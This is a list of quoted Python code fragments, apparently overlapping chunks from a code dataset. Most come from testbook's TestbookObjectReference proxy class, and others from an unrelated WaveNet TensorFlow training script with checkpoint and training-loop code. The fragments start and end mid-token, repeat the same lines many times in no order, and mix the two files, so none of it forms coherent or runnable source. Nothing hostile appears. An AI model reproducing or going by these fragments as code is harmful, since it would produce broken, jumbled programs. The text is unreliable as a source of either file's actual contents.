"{iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except",
"f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return",
"__init__(self, tb, name): self.tb = tb self.name: str = name @property def _type(self):",
"self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function call pass except TestbookSerializeError",
"TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __contains__(self, item): return",
"name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass is TypeError:",
"@property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if",
"def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return",
"def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\")",
"value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue)",
"TestbookExecuteResultNotFoundError: # No return value from function call pass except TestbookSerializeError as e:",
"random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb =",
"def __init__(self, tb, name): self.tb = tb self.name: str = name @property def",
"except TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration else: raise def",
"key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except",
"import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb = tb self.name: str",
"is IndexError: raise IndexError(e.evalue) else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self,",
"__getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no",
"item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try:",
"raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass",
"TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError:",
"return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs):",
"TestbookObjectReference: def __init__(self, tb, name): self.tb = tb self.name: str = name @property",
"return value from function call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb, e.save_varname)",
".translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb = tb self.name:",
"TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self,",
"code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return",
"self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb,",
"iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self):",
"name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute",
"is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def",
"e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return",
"f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs): return self.tb.value(",
"try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as",
"self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def",
"self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\"))",
"= name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self,",
"TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs): return",
"<reponame>loichuder/testbook from .exceptions import ( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import",
"raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name,",
"= tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self):",
"kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function call",
"self.tb = tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def",
"return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if",
"IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] =",
"return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return",
"{value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass is",
"key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass is TypeError: raise",
"try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function call pass",
"value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError",
"= iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError",
"try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration",
"TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from .translators import PythonTranslator",
"{name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self):",
"return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}'",
"TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass",
"**kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No",
"return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e:",
"def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has",
"raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key,",
"tb, name): self.tb = tb self.name: str = name @property def _type(self): return",
"\"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname =",
"return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return",
"return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self):",
"as e: if e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self, key):",
"elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try:",
"from .exceptions import ( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname",
"self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass",
"key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise",
") from .utils import random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self,",
"from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb = tb",
"rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def",
"__next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise",
"else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if",
"e: if e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self, key): try:",
"self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb,",
"self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration else: raise",
"= f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try:",
"\"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e:",
"name): self.tb = tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\")",
"try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue)",
"self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\")",
"__setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True)",
"raise StopIteration else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as",
"from function call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb, e.save_varname) def resolve(self):",
"import random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb",
"if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else:",
"iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is",
"str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def"
] |
[
"if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir):",
"save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce a line",
"save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint",
"Saver for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step",
"import datetime from pathlib import Path import tensorflow as tf from tensorflow.python.client import",
"line. print() finally: if step > last_saved_step: save(saver, sess, args.log_dir, step) def save(saver,",
"from dataclasses import dataclass import numpy as np import os import sys import",
"The first training step will be saved_global_step + 1, # therefore we put",
"first training step will be saved_global_step + 1, # therefore we put -1",
"checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints",
"Done.') def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir),",
"loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path =",
"Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver",
"numpy as np import os import sys import time from datetime import datetime",
"-1 except: print(\"Something went wrong while restoring checkpoint. \" \"We will terminate training",
"step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w')",
"timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value,",
"global_step else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root,",
"network on the VCTK corpus. This script trains a network with the WaveNet",
"if args.store_metadata and step % 50 == 0: # Slow run that stores",
"tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from",
"print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING)",
"logdir if __name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f:",
"def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\")",
"= os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir):",
"0.0 max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer): # Load raw",
"Slow run that stores extra information for debugging. print('Storing metadata') run_options = tf.RunOptions(",
"import Path import tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto import",
"# Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) #",
"KeyboardInterrupt: # Introduce a line break after ^C is displayed so save message",
"import time from datetime import datetime from pathlib import Path import tensorflow as",
"STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data' /",
"batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None)",
"= 5 store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int =",
"step > last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess, logdir, step): model_name",
"max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer): # Load raw waveform",
"\"\"\"Training script for the WaveNet network on the VCTK corpus. This script trains",
"'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int",
"extra information for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _",
"tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary,",
"be skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size)",
"int = 5 def train(args: TrainParams, net, optimizer): # Load raw waveform from",
"tf.name_scope('create_inputs'): # Allow silence trimming to be skipped by specifying a threshold near",
"if __name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params",
"+ 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step + 1,",
"{} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step",
"trains a network with the WaveNet using data from the VCTK corpus, which",
"{}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No",
"range(saved_global_step + 1, args.num_steps): if args.store_metadata and step % 50 == 0: #",
"saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total",
"ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1]",
"str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\")",
"the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if",
"model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess,",
"\"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size: int = 1",
"step except KeyboardInterrupt: # Introduce a line break after ^C is displayed so",
"filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer =",
"epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch =",
"int = 1 sample_size: int = 100000 learning_rate: float = 1e-4 max_to_keep: int",
"up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries =",
"as tf from tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf import",
"save(saver, sess, args.log_dir, step) def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path",
"corpus. This script trains a network with the WaveNet using data from the",
"= n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next()",
"import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR =",
"dataclass import numpy as np import os import sys import time from datetime",
"This script trains a network with the WaveNet using data from the VCTK",
"is None: # The first training step will be saved_global_step + 1, #",
"step = None last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step -",
"for new or overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong while",
"+ 1, args.num_steps): if args.store_metadata and step % 50 == 0: # Slow",
"1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float = 0.0",
"on the VCTK corpus. This script trains a network with the WaveNet using",
"run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss, optim], options=run_options,",
"Done.\") return global_step else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir",
"f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"],",
"= str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every:",
"a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples //",
"'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary,",
"ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint found.\") return None def",
"with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"],",
"WaveNet network on the VCTK corpus. This script trains a network with the",
"tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess",
"= sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl =",
"optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class",
"/ \"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size: int =",
"http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob import json from",
"tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent",
"TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size,",
"sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce a line break",
"pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0 and step % args.checkpoint_every",
"from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams:",
"max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None: # The",
"stores extra information for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value,",
"# is on its own line. print() finally: if step > last_saved_step: save(saver,",
"print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return",
"iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength)",
"import dataclass import numpy as np import os import sys import time from",
"saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint",
"we put -1 here for new or overwritten trainings. saved_global_step = -1 except:",
"global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set up logging",
"tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver =",
"= False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def train(args: TrainParams,",
"= saved_global_step try: total = args.num_steps - saved_global_step - 1 pbar = tqdm(",
"tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer =",
"= tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata)",
"= tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session",
"= 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush()",
"batch_size: int = 1 sample_size: int = 100000 learning_rate: float = 1e-4 max_to_keep:",
"== 0: # Slow run that stores extra information for debugging. print('Storing metadata')",
"= tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init)",
"initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step +",
"checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step)",
"No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return",
"0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim",
"checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size:",
"# Slow run that stores extra information for debugging. print('Storing metadata') run_options =",
"a line break after ^C is displayed so save message # is on",
"total = args.num_steps - saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step +",
"sess.run( [summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats)",
"with the WaveNet using data from the VCTK corpus, which can be freely",
"= Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR /",
"audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch,",
"will terminate training to avoid accidentally overwriting \" \"the previous model.\") raise step",
"import json from dataclasses import dataclass import numpy as np import os import",
"import numpy as np import os import sys import time from datetime import",
"in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step % 50 == 0:",
"'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000",
"session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing",
"\"the previous model.\") raise step = None last_saved_step = saved_global_step try: total =",
"l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) # Set up logging for",
"overwriting \" \"the previous model.\") raise step = None last_saved_step = saved_global_step try:",
"logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args =",
"TrainParams, net, optimizer): # Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): #",
"skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4) train(args,",
"float = 0.0 max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer): #",
"tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True))",
"its own line. print() finally: if step > last_saved_step: save(saver, sess, args.log_dir, step)",
"args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable =",
"1 pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})')",
"= optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph())",
"= int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess,",
